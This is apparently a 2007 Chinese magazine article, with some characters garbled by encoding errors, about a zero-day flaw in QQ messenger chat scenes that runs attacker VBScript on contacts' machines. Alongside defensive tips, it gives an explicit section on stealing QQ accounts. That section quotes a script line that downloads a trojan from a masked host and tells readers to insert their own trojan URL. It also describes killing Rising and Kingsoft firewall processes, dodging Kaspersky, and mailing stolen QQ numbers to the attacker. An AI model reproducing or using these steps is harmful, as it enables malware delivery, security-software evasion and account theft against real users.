根據(jù)易觀國(guó)際發(fā)布《2007年第2季度中國(guó)即時(shí)通訊市場(chǎng)季度監(jiān)測(cè)》報(bào)告顯示，中國(guó)活躍的IM軟件賬號(hào)已經(jīng) 達(dá)到了3.76億個(gè)，其中擁有2.9億活躍用戶(hù)賬號(hào)的騰訊QQ是當(dāng)之無(wú)愧的IM王者?？墒悄阒绬幔愕腝Q現(xiàn)在很危險(xiǎn)了! 

　　不需要什么高超的技巧，黑客就可以輕松地盜取你的QQ。想知道他們是怎么做的以及該如何避免自己的QQ 被盜嗎?快隨小編一起看看QQ場(chǎng)景漏洞的破解之法(屬于0DAY漏洞)。

　　月黑風(fēng)高夜，黑客挖出了一個(gè)寶箱，里面盛放著光彩奪目的“QQ場(chǎng)景漏洞”。他們驚奇的發(fā)現(xiàn)，不需要有什么高超的技巧，只要懂一點(diǎn)基本的腳本代碼編寫(xiě)，就可以輕松地盜取別人的QQ、秘密安裝監(jiān)控軟件或破壞系統(tǒng)等。于是，地獄之門(mén)就被打開(kāi)了，所有的QQ用戶(hù)都被恐懼籠罩著。

　　一、QQ場(chǎng)景漏洞的利用原理解析

　　聊天場(chǎng)景是QQ軟件中的一項(xiàng)基本功能，可以讓聊天的雙方使用同樣的場(chǎng)景，從而拉近聊天用戶(hù)之間的距離 。不過(guò)最新的QQ場(chǎng)景漏洞，可能會(huì)讓大家的QQ有被盜的風(fēng)險(xiǎn)。

　　該漏洞的利用原理很簡(jiǎn)單，攻擊者向其QQ列表內(nèi)的用戶(hù)發(fā)送一個(gè)惡意構(gòu)造的場(chǎng)景，場(chǎng)景里面包括圖片文件、VBScript.qqs文件和Config.qqs文件，其中VBScript.qqs文件就是編寫(xiě)惡意代碼的地方，然后在遠(yuǎn)程系統(tǒng)中執(zhí)行即可。

　　二、QQ場(chǎng)景漏洞的危害有多大

　　QQ場(chǎng)景漏洞的危害到底多大?重則可能系統(tǒng)崩潰，資料消失;輕則可能QQ被盜，這些后果都是很?chē)?yán)重的。更可怕的是，漏洞的利用方法特別簡(jiǎn)單，不需要什么操作即可實(shí)現(xiàn)，會(huì)成為大量手癢的菜鳥(niǎo)黑客們的最?lèi)?ài)。

　　添加的腳本代碼的作用不同，造成的危害性也會(huì)不同。比如，如果是一段文件下載腳本代碼的話(huà)，那么代 碼就會(huì)自動(dòng)下載設(shè)置的文件并默默地運(yùn)行。如果下載的是木馬后門(mén)程序的話(huà)，黑客就可以通過(guò)木馬進(jìn)行遠(yuǎn)程控制。如果是一段格式化代碼的話(huà)，那么磁盤(pán)中的文件就會(huì)瞬間被清除掉。

　　小提示：QQ場(chǎng)景漏洞的危害程度判斷是參考了標(biāo)準(zhǔn)的次高危害漏洞(百度搜霸遠(yuǎn)程執(zhí)行漏洞)和標(biāo)準(zhǔn)的中等危害漏洞(WMP AU文件除零漏洞)。

三、試用QQ場(chǎng)景漏洞 

　　首先，將QQ場(chǎng)景漏洞所需的場(chǎng)景文件下載到本地系統(tǒng)，解壓后復(fù)制到系統(tǒng)中QQ的安裝目錄X:\Program Files\Tencent\QQ下面，這樣在Scene文件夾中就多了一個(gè)場(chǎng)景目錄?，F(xiàn)在我們就可以進(jìn)行測(cè)試操作，不過(guò)為了彈出窗口更加有個(gè)性化，我們要對(duì)場(chǎng)景目錄真的腳本文件進(jìn)行修改。

　　接著，用文本編輯器打開(kāi)其中的VBScript.qqs文件，在文件代碼中找到MsgBox這個(gè)消息函數(shù)，該函數(shù)后面 跟著的就是該場(chǎng)景在執(zhí)行后彈出的信息內(nèi)容，這里我們可以將它設(shè)置為自己需要彈出的內(nèi)容信息，比如設(shè)置為“電腦報(bào)，我的最?lèi)?ài)!”。如果你熟悉VBS腳本，可以設(shè)置更有個(gè)性的語(yǔ)句。

　　然后，隨便在QQ聯(lián)系人列表中找一個(gè)人，無(wú)論對(duì)方使用的是QQ還是TM都可以，雙擊打開(kāi)其聊天窗口。然后 點(diǎn)擊工具欄中的“選擇音樂(lè)場(chǎng)景”按鈕，在彈出的窗口中選擇打開(kāi)“我的場(chǎng)景”標(biāo)簽，并且找到一個(gè)和場(chǎng)景目 錄名稱(chēng)相同的場(chǎng)景。這樣這個(gè)帶有VBS腳本的場(chǎng)景，就會(huì)自動(dòng)的下載到遠(yuǎn)程好友的QQ 中并運(yùn)行。

　　四、如何利用QQ場(chǎng)景漏洞盜QQ

　　漏洞用熟后，就可以開(kāi)始盜QQ了。首選下載該漏洞的利用代碼，然后進(jìn)行簡(jiǎn)單的修改即可。下面就對(duì)代碼 的關(guān)鍵部分進(jìn)行講解。
　　iLocal = LCase("c:\mm.exe"):iRemote = LCase("http://www.****.com/mygim.exe")
　　代碼作用是將文件下載到磁盤(pán)中指定的位置，我們只需要把其中的http://www.****.com/mygim.exe改為自
己的木馬地址即可。


　　這段代碼主要有兩個(gè)作用，首先是通過(guò)修改系統(tǒng)的時(shí)間，從而讓下載的木馬程序躲過(guò)卡巴斯基的主動(dòng)防御 功能。接著用于檢測(cè)系統(tǒng)中是否存在瑞星防火墻，如果存在的話(huà)就結(jié)束該防火墻的進(jìn)程。

　　當(dāng)然我們可以依葫蘆畫(huà)瓢來(lái)添加結(jié)束其他進(jìn)程的代碼，比如要結(jié)束金山網(wǎng)鏢的進(jìn)程，只需要將代碼if  ps.Name="rfwsrv.exe" Then 中的rfwsrv.exe，替換為金山網(wǎng)鏢的進(jìn)程名稱(chēng)KPFW32.exe即可。經(jīng)過(guò)這一系列的處理以后，盜號(hào)木馬就能成功的獲取遠(yuǎn)程用戶(hù)的QQ號(hào)碼，并且最終發(fā)送到我們指定的信箱里面呢。

五、QQ場(chǎng)景漏洞的防范措施 

　　由于QQ場(chǎng)景漏洞是一個(gè)全新的0DAY漏洞，因此現(xiàn)在還沒(méi)有現(xiàn)成的安全補(bǔ)丁可以使用，所以只能臨時(shí)用其他 的方法來(lái)進(jìn)行相關(guān)的防范。有的人說(shuō)TM沒(méi)有聊天場(chǎng)景，因此可以利用TM來(lái)代替QQ，但是經(jīng)過(guò)我們的測(cè)試發(fā)現(xiàn)TM 依然受到該漏洞的影響。

　　同樣在聯(lián)系人列表中任意的選擇一位，接著點(diǎn)擊工具欄中的“選擇音樂(lè)場(chǎng)景”按鈕，然后在“我的場(chǎng)景”標(biāo)簽中點(diǎn)擊“在我的場(chǎng)景設(shè)置”按鈕?，F(xiàn)在只需要在彈出的窗口里面把“接受場(chǎng)景邀請(qǐng)”前面的勾去掉就可以 啦。除此以外，還可以選擇Scene目錄的屬性選項(xiàng)，將它的屬性設(shè)置為只讀即可。

　　如果用戶(hù)已經(jīng)不信“中標(biāo)”的話(huà)，那么現(xiàn)在還有兩種方法可以解決。第一在“我的場(chǎng)景”標(biāo)簽里，選擇“ 不使用場(chǎng)景”選項(xiàng)就可以。另外可以直接到QQ目錄中的Scene文件夾，將它中的所有內(nèi)容徹底刪除，就可以完全 避免以前的漏洞場(chǎng)景被重新激活。

　　六、QQ場(chǎng)景漏洞的預(yù)防方案

　　由于QQ場(chǎng)景漏洞是通過(guò)惡意腳本來(lái)進(jìn)行操作的，因此要預(yù)防漏洞的方法就是防止非法的聊天場(chǎng)景寫(xiě)入系統(tǒng) 磁盤(pán)。

　　我們可以通過(guò)一款名為《系統(tǒng)安全盾》的安全軟件進(jìn)行防范，該程序不但可以對(duì)設(shè)置的文件夾進(jìn)行有效的 監(jiān)控，還可以對(duì)非法運(yùn)行的程序進(jìn)行有效的攔截操作，這樣就從多個(gè)方面對(duì)系統(tǒng)安全進(jìn)行保護(hù)，并且該程序的 自身保護(hù)能力也非常的強(qiáng)，只有在正確的輸入了確認(rèn)碼后才會(huì)彈出，有效的防止程序進(jìn)程被惡意代碼非法結(jié)束

。

　　《系統(tǒng)安全盾》運(yùn)行后，點(diǎn)擊程序主界面中“監(jiān)控設(shè)置”菜單中的“監(jiān)控設(shè)置調(diào)整”命令。程序在默認(rèn)的情況下，是無(wú)法將文件添加到系統(tǒng)目錄的。為了更好的監(jiān)控下載的聊天場(chǎng)景，我們點(diǎn)擊鼠標(biāo)右鍵來(lái)新增項(xiàng)目，雙擊新增的項(xiàng)目來(lái)設(shè)置新的監(jiān)控路徑，然后將項(xiàng)目?jī)?nèi)容都選擇√選項(xiàng)。
　　接著再在“文件黑名單”選項(xiàng)里面，將聊天場(chǎng)景中主要的VBScript.qqs文件添加到黑名單，更改配置后一 定要點(diǎn)擊“應(yīng)用設(shè)置”按鈕進(jìn)行保存。這樣當(dāng)程序檢測(cè)到這些可疑文件后，就會(huì)立即的進(jìn)行攔截操作并提示用戶(hù)。 

最新評(píng)論